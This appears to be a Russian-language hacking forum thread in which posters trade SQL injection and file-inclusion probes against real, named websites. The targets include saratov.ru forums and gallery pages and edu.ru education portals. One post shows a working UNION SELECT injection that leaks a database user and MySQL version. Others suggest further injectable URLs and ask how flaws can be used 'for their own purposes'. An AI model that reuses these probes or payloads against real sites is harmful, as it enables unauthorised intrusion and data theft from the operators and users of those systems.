http://www.usgs.gov/
уже фильтрацию поставили гады ((
тока два дня назад нашел ((

нашел сайтец при www.site.ru/id=1' при отправке такого запроса он мен выдает вот это

Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "'"]'

/support/includes/inc_news.asp, line 82

я понял что это mssql но возможно ли тут инъекция, очень сложный вопрос так как я попробовал узнаь версию он мне выдал вот что
Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "@@version--"]'

/support/includes/inc_news.asp, line 82


я попробовал множество вариантов , прочитал статьи и нашел что базы данных
Vbscript впринципе невозможно взломать,... но надежда умирает последней может вы что то можете предложить... спасибо
саму ссылку пока не даю так как , разъяснить надо поподробнее если уже идей не будет дам и ссылку... спасибо заранее

Объясните ламеру возможно ли это как-то использовать в своих целях? :)

http://forums.saratov.ru/index.php?act=members&st=%20-1
и
http://forums.saratov.ru/ips_kernel/PEAR/Text/Diff3.php

я конечно плохо разбираюсь но попервой ссылке если ты поймешь что там написано , может это и ошибка , хотя врядли ничего по ней не сделаешь...
а вот по второй ,это либо админ подлный дибил и с ошибкой фоурм, либо там инклуд (php инклуд) статьи есть на ачате.... хотя я плохо разбираюсь в инкоуде так что могу ошибится... просто сомнения из за того что ты не задал лишних параметров..

Taylorith там строка задается. ничего не сделаешь

Раскручивай лучше отсюда http://saratov.ru/ads/click.cgi?account='

Вот что я нашел по Саратову
http://www.saratov.ru/gallery/?show=gal&id=-3+union+select+1,22222/*
Таблицы не подобрал... :( пробовал mysql.user и ibf_members может руки не оттуда?..

saratov
gallery@localhost
4.0.17

http://www.edu.ru/index.php?page_id=50&op=word&wid=-1'
Выодит mysq еррор....начинаю перебор - он мне аццес денайед((

http://www.law.edu.ru/matlist.asp?themRub=20'&docType=11
что можно сделать?